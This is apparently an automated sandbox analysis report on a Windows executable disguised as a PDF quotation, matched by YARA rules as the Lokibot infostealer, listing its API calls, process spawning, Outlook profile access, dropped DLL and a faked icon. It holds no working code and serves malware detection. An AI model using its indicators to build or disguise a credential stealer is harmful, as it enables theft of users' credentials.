          Source: 2.0.QUOTAZIONEpdf.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.0.QUOTAZIONEpdf.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.2.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.QUOTAZIONEpdf.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.0.QUOTAZIONEpdf.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.QUOTAZIONEpdf.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 2.0.QUOTAZIONEpdf.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.0.QUOTAZIONEpdf.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 2.1.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.1.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.2.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.QUOTAZIONEpdf.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 2.0.QUOTAZIONEpdf.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.0.QUOTAZIONEpdf.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.QUOTAZIONEpdf.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 2.0.QUOTAZIONEpdf.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.0.QUOTAZIONEpdf.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.QUOTAZIONEpdf.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 2.0.QUOTAZIONEpdf.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.0.QUOTAZIONEpdf.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.QUOTAZIONEpdf.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.0.QUOTAZIONEpdf.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,1_2_00403225
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_0040604C1_2_0040604C
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_004047721_2_00404772
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 2_2_0040549C2_2_0040549C
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 2_2_004029D42_2_004029D4
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: String function: 0041219C appears 45 times
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: String function: 00405B6F appears 42 times
          Source: QUOTAZIONEpdf.exe, 00000001.00000003.292277213.0000000003196000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs QUOTAZIONEpdf.exe
          Source: QUOTAZIONEpdf.exe, 00000001.00000003.292572602.000000000332F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs QUOTAZIONEpdf.exe
          Source: QUOTAZIONEpdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeFile read: C:\Users\user\Desktop\QUOTAZIONEpdf.exeJump to behavior
          Source: QUOTAZIONEpdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\QUOTAZIONEpdf.exe "C:\Users\user\Desktop\QUOTAZIONEpdf.exe"
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess created: C:\Users\user\Desktop\QUOTAZIONEpdf.exe "C:\Users\user\Desktop\QUOTAZIONEpdf.exe"
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess created: C:\Users\user\Desktop\QUOTAZIONEpdf.exe "C:\Users\user\Desktop\QUOTAZIONEpdf.exe" Jump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 2_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,2_2_0040650A
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsr3B69.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/6@56/2
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_00402012 CoCreateInstance,MultiByteToWideChar,1_2_00402012
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,1_2_00404275
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
          Source: Binary string: wntdll.pdbUGP source: QUOTAZIONEpdf.exe, 00000001.00000003.292355502.0000000003210000.00000004.00000001.sdmp, QUOTAZIONEpdf.exe, 00000001.00000003.296307100.0000000003080000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: QUOTAZIONEpdf.exe, 00000001.00000003.292355502.0000000003210000.00000004.00000001.sdmp, QUOTAZIONEpdf.exe, 00000001.00000003.296307100.0000000003080000.00000004.00000001.sdmp

          Data Obfuscation:

          barindex
          Yara detected aPLib compressed binaryShow sources
          Source: Yara matchFile source: 1.2.QUOTAZIONEpdf.exe.3040000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.QUOTAZIONEpdf.exe.3040000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.QUOTAZIONEpdf.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: QUOTAZIONEpdf.exe PID: 6352, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: QUOTAZIONEpdf.exe PID: 808, type: MEMORYSTR
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_72FB1000 push eax; ret 1_2_72FB102E
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 2_2_00402AC0 push eax; ret 2_2_00402AD4
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 2_2_00402AC0 push eax; ret 2_2_00402AFC
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,1_2_00405DA3
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsr3B6B.tmp\tncvu.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Icon mismatch, binary includes an icon from a different legit application in order to fool usersShow sources
          Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (27).png
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
